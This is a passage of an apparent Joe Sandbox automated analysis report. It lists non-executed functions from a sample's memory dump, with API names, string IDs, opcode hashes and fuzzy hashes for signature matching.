                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: 71a4a5de5693dcab2a73995307dc02eb63390f7ea8d50aa23e6eb166249b21b2
                                                                                                            • Instruction ID: 2a5cd5fdb2ee4db5f3b5da6d27b706eb1649812df5818df0d3839080981acd70
                                                                                                            • Opcode Fuzzy Hash: 71a4a5de5693dcab2a73995307dc02eb63390f7ea8d50aa23e6eb166249b21b2
                                                                                                            • Instruction Fuzzy Hash: 13F0A422A08647A4FF649F24E040275A676DB14B78F995334DB7C095D8CE68D8D5DB20

                                                                                                            Non-executed Functions

                                                                                                            Function 00007FF7390D62F0 Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 205windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Item$DialogMessageSendTextWindow
                                                                                                            • String ID: %s %s$REPLACEFILEDLG
                                                                                                            • API String ID: 1217692187-439456425
                                                                                                            • Opcode ID: 7e743eea4c5fe27cbc475bff0a032f79460ee1a4e6b162aad2cbbf898a43113e
                                                                                                            • Instruction ID: 3236c0bab3df3a5b37404076f49b68ccce4ff2d93547b84b03285c6d93090858
                                                                                                            • Opcode Fuzzy Hash: 7e743eea4c5fe27cbc475bff0a032f79460ee1a4e6b162aad2cbbf898a43113e
                                                                                                            • Instruction Fuzzy Hash: F8919122608A87AAF730BF21D8543EDA372FB45B88F800135DA5E1BA85DF7DD605D710
                                                                                                            Function 00007FF7390E93D0 Relevance: 24.1, APIs: 9, Strings: 4, Instructions: 1310COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _invalid_parameter_noinfomemcpy_s$fegetenv
                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                            • API String ID: 281475176-2761157908
                                                                                                            • Opcode ID: 138aa20f64d2b872b9cafcae301f720a79689025565da3af3d40d5d75cc2fd4f
                                                                                                            • Instruction ID: fd1a2c1dd747ae617ab3045a8671f93d6dd93b96f0adae08fc8923ef59c6407c
                                                                                                            • Opcode Fuzzy Hash: 138aa20f64d2b872b9cafcae301f720a79689025565da3af3d40d5d75cc2fd4f
                                                                                                            • Instruction Fuzzy Hash: F7B24A72E085879BF7259E29D4407FDB7B2FB88388F905135DA5A67B84DF38E9009B10
                                                                                                            Function 00007FF7390DA3B8 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 3140674995-0
                                                                                                            • Opcode ID: 30e0005e86cff94bdb5f8170cda726c4d3beec0a3525fda062c9092959c450a5
                                                                                                            • Instruction ID: 45e583619fccf0ea1b98f7bd3e1b531cbdb0257f2aaa25f5ad7ab266ef4e9d9f
                                                                                                            • Opcode Fuzzy Hash: 30e0005e86cff94bdb5f8170cda726c4d3beec0a3525fda062c9092959c450a5
                                                                                                            • Instruction Fuzzy Hash: 40317272A09B8696EB609F64E8403EDB372FB84744F84443ADA4E57B98DF3CC548D724
                                                                                                            Function 00007FF7390DE7F4 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 1239891234-0
                                                                                                            • Opcode ID: 00624823e57681c30c13fece64d8aaf11efe22d58e077a3bdf7bc942a834ef76
                                                                                                            • Instruction ID: fbeb63c7c26002923131f5c8b6549ded7e6d33ccf36acba034b2f68f11f6e31e
                                                                                                            • Opcode Fuzzy Hash: 00624823e57681c30c13fece64d8aaf11efe22d58e077a3bdf7bc942a834ef76
                                                                                                            • Instruction Fuzzy Hash: 89316133A08F8296EB609F25E8402AEB3B5FB88754F940136EA9D43B58DF3CD145DB10
                                                                                                            Function 00007FF7390E6BB4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7390E6BE4
                                                                                                              • Part of subcall function 00007FF7390DEA50: GetCurrentProcess.KERNEL32(00007FF7390E7DED), ref: 00007FF7390DEA7D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                            • String ID: *?$.
                                                                                                            • API String ID: 2518042432-3972193922
                                                                                                            • Opcode ID: 87d11017d9341af364725c3e67d9608657ad904e7b04912313f7914f5ad83397
                                                                                                            • Instruction ID: 99d6668dd62a9312af092b0466f4a924551c64ed6f69928bf717c875a365f76d
                                                                                                            • Opcode Fuzzy Hash: 87d11017d9341af364725c3e67d9608657ad904e7b04912313f7914f5ad83397
                                                                                                            • Instruction Fuzzy Hash: 9451D362F14E9A95EB10FF62A8004BDA7B6FB58BD8B844532DE1D17B85DE3CE0419320
                                                                                                            Function 00007FF7390E8F00 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy_s
                                                                                                            • String ID:
                                                                                                            • API String ID: 1502251526-0
                                                                                                            • Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                                            • Instruction ID: ff111d834d42106839f509f5f1e0631126183ab8e8f9d7df4e5772d6811e1804
                                                                                                            • Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                                            • Instruction Fuzzy Hash: 8CD1B332F18A8A97DB34DF15E18466AB7A2F788784F948134DB9E57B44CA3CEC41DB00
                                                                                                            Function 00007FF7390E6DC0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: .
                                                                                                            • API String ID: 0-248832578
                                                                                                            • Opcode ID: 7e223753cbb0d098fc9d63f62c557380f881683af043a5de1f54d36ddfe02510
                                                                                                            • Instruction ID: bd7a621df57f1005206d267f0c8ac0aa25a02709c12eb376892daae48fdd672e
                                                                                                            • Opcode Fuzzy Hash: 7e223753cbb0d098fc9d63f62c557380f881683af043a5de1f54d36ddfe02510
                                                                                                            • Instruction Fuzzy Hash: 3B31ED22F14A9655FB20BF36E8047A9FAA2BB44BE4F948235EE5D07BC5CE3CD5019300
                                                                                                            Function 00007FF7390ECBD8 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionRaise_clrfp
                                                                                                            • String ID:
                                                                                                            • API String ID: 15204871-0
                                                                                                            • Opcode ID: 48149d93cb04e965030c1456af6ef5ca544fe12c8eaafc8cc72e3d8d4d9bd7b4
                                                                                                            • Instruction ID: 623f6f34a3029efd56dfbc808ad1a71b13e54531eb0b5ae2a5c828d2d29d9c9c
                                                                                                            • Opcode Fuzzy Hash: 48149d93cb04e965030c1456af6ef5ca544fe12c8eaafc8cc72e3d8d4d9bd7b4
                                                                                                            • Instruction Fuzzy Hash: 01B17E73A04B9ACBEB19DF29C84636CBBB1F744B48F148922DA5D837A4CB3AD451C710
                                                                                                            Function 00007FF7390D41FC Relevance: 3.2, APIs: 2, Instructions: 186COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ObjectRelease$CapsDevice
                                                                                                            • String ID:
                                                                                                            • API String ID: 1061551593-0
                                                                                                            • Opcode ID: 434afd39a949f959f1fbe7fcbb1bc365373ab6095110232238b2a3c13369e3f7
                                                                                                            • Instruction ID: 48063791bb47c09e571a276002f90f5b477f79d9cc66ca8b5ca1bf454c969fc0
                                                                                                            • Opcode Fuzzy Hash: 434afd39a949f959f1fbe7fcbb1bc365373ab6095110232238b2a3c13369e3f7
                                                                                                            • Instruction Fuzzy Hash: 10813C77B18A4A96EB10DF6AE4406ADB772FB84B88F804132DE0D57B68DF38D105D750
                                                                                                            Function 00007FF7390D4CE8 Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FormatInfoLocaleNumber
                                                                                                            • String ID:
                                                                                                            • API String ID: 2169056816-0
                                                                                                            • Opcode ID: f88d475bfbfff7b674aebf49a1ef2a05e2ac82beef8a94fc9049c487f82c89bd
                                                                                                            • Instruction ID: 6cd277ddd0290f7f39b8fe585bf4956305f76243bbf3f5bfcecfd76278e6a1c0
                                                                                                            • Opcode Fuzzy Hash: f88d475bfbfff7b674aebf49a1ef2a05e2ac82beef8a94fc9049c487f82c89bd
                                                                                                            • Instruction Fuzzy Hash: 30114A32A09B86A5E661AF21F8503AAB372FF88B44FC44135DA4D03668DF3CE245D754
                                                                                                            Function 00007FF7390C1C18 Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFormatLastMessage
                                                                                                            • String ID:
                                                                                                            • API String ID: 3479602957-0
                                                                                                            • Opcode ID: 6770c0ad4a9a0f244e45bc1204239cf4a9539eb8119f4b349ddb2516eb6b789c
                                                                                                            • Instruction ID: 6ae96c2ec08fd7fb829f9041ba509358ccad03b20ac4fffba38d2c6e77243023
                                                                                                            • Opcode Fuzzy Hash: 6770c0ad4a9a0f244e45bc1204239cf4a9539eb8119f4b349ddb2516eb6b789c
                                                                                                            • Instruction Fuzzy Hash: 7DE0E572B0864692E7109F22F48032BE2A6BB44BC4F448134EA8947A98CF3CC5509B10
                                                                                                            Function 00007FF7390C3B10 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Version
                                                                                                            • String ID:
                                                                                                            • API String ID: 1889659487-0
                                                                                                            • Opcode ID: 1ada32755e96775185cc985e92dc68e63766ffd3a29144c593546efedc2bec49
                                                                                                            • Instruction ID: fbc69e8e41ec321f6569661781957c8c2b1b8d037ba54ec146f38b59bf9d1b4d
                                                                                                            • Opcode Fuzzy Hash: 1ada32755e96775185cc985e92dc68e63766ffd3a29144c593546efedc2bec49
                                                                                                            • Instruction Fuzzy Hash: 60014031A1854397E6A4EF10F891376B3B3FB88354FA00235E65D86394DF3CE501AE24
                                                                                                            Function 00007FF7390DFBEC Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 3215553584-4108050209
                                                                                                            • Opcode ID: 912139878c6fa971410ca4ed88f54829f533ac8cb18e91c520a138b7211dfeae
                                                                                                            • Instruction ID: ec78b0271b0f7e58928bf641c85cf8349378845e267006c035e9d03d46d7eadc
                                                                                                            • Opcode Fuzzy Hash: 912139878c6fa971410ca4ed88f54829f533ac8cb18e91c520a138b7211dfeae
                                                                                                            • Instruction Fuzzy Hash: E5814623A2860366FA64AE10916067DB3B3EF41748FE49531DE0D87695CF2DE842F721
                                                                                                            Function 00007FF7390DF970 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 3215553584-4108050209
                                                                                                            • Opcode ID: db1fee231e5625b661d99c0bb1e1601d32928d345e8b8bd10099f265d6b394a5
                                                                                                            • Instruction ID: 7745b9e3889c7833c4a1467c2e8242b3a1128c9d94709a5a9cab144c3ac67d3f
                                                                                                            • Opcode Fuzzy Hash: db1fee231e5625b661d99c0bb1e1601d32928d345e8b8bd10099f265d6b394a5
                                                                                                            • Instruction Fuzzy Hash: E3713C63E2C24366F764AE2C406027DE7F39F41744F989531DF0C8768ACE6DE845A761
                                                                                                            Function 00007FF7390E3904 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: @
                                                                                                            • API String ID: 0-2766056989
                                                                                                            • Opcode ID: 5e7f2aa48a949b7a90d1de097939cfba190d190f8aeb13b7fd9410243dcdf918
                                                                                                            • Instruction ID: 270fa559bcdf1f5820d820688c36847ded8ea92860f0ff2fa316f6a6db16d434
                                                                                                            • Opcode Fuzzy Hash: 5e7f2aa48a949b7a90d1de097939cfba190d190f8aeb13b7fd9410243dcdf918
